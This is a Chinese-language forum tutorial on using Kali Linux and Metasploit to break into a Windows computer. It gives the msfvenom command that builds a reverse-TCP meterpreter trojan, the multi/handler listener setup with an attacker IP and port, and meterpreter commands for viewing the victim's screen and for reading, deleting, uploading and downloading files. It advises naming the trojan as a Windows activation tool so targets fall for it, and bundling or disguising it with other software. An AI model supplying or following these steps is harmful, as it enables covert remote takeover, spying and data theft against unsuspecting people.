Kali利用msf入侵Windows电脑(最详细渗透流程、生成木马、监听-Kali Linux社区-电脑端-X黑手网
X黑手网
点击查看-X黑手网
点击查看-X黑手网

Kali利用msf入侵Windows电脑(最详细渗透流程、生成木马、监听

image

 

入侵电脑,并没有我们想象的那么难,今天我们的文章主要是给一些基础比较薄弱的小伙伴们准备的,如果你从来没有利用msf进入过对方计算机,就赶紧找个风和日丽的下午,跟着博主一起来试试吧~

 

01
什么是msf
演示环境
02
渗透流程
  • 进入管理员模式
  • 生成可执行木马文件
  • 运行msfconsole命令
  • 配置参数
  • 在靶机打开可执行文件
  • 查看用户
03
meterpreter入侵对方电脑的命令
  • 监控对方电脑屏幕
  • 更多命令

 

以上是我们本篇文章的总体流程,下面就让我们一步一步的实现它们

 

01
什么是msf
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。

 

演示环境
使用Kali 2021.3进行演示操作
目标靶机:Win10专业版
软件:msfvenom、msfconsole(Kali系统内置)

 

02
渗透流程
1.进入管理员模式
命令: sudo su
解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令

image

 

提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可

 

2.生成可执行木马文
命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST
=<本地ip> LPORT=<本地端口号> –f exe –o <文件名>.exe
解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址
本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性
文件名可以随便写自己喜欢的名字,比如写Win10激活工具,可能更容易让目标主机上钩
当然MSF也可以用来入侵手机、mac、Linux等

image

 

提示:这个就是Kali主机的IP地址

 

接下来运行命令生成木马

image

 

 

默认生成的文件在根目录下

image

 

 

把刚才生成的文件放到目标靶机Win10系统中

 

3.运行msfconsole命令
命令: msfconsole

image

 

 

4.配置参数
(1)命令: use exploit/multi/handler (选择模块)
(2)命令:set payload windows/meterpreter/
  reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192.168.32.1 (填写自己主机的IP地址)
(4)命令: set lport 1111 (填写刚才生成文件时的端口号)
(5)命令: show options (查看设置参数)
(6)命令: exploit -z -j (后台执行)
提示:参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击

image

 

 

5.在靶机打开执行文件

image

 

 

我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面

 

2.查看用户
(1)命令: sessions(查看上钩的用户)
(2)命令: sessions -i 1(选择需要攻击的用户,这里选择第 1 个)

image

 

提示:出现meterpreter你就已经成功的入侵的对方的电脑

 

03
meterpreter入侵对方电脑的命令
1.监控对方电脑屏幕
命令: run vnc -i

image

 

2.更多命令
还可以查看帮助文档,命令help
cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程
把文件上传到靶机命

image

 

把文件下载到主机命令

image

 

今天的内容就分享到这里
为方便大家讨论
请登录后发表评论

    没有回复内容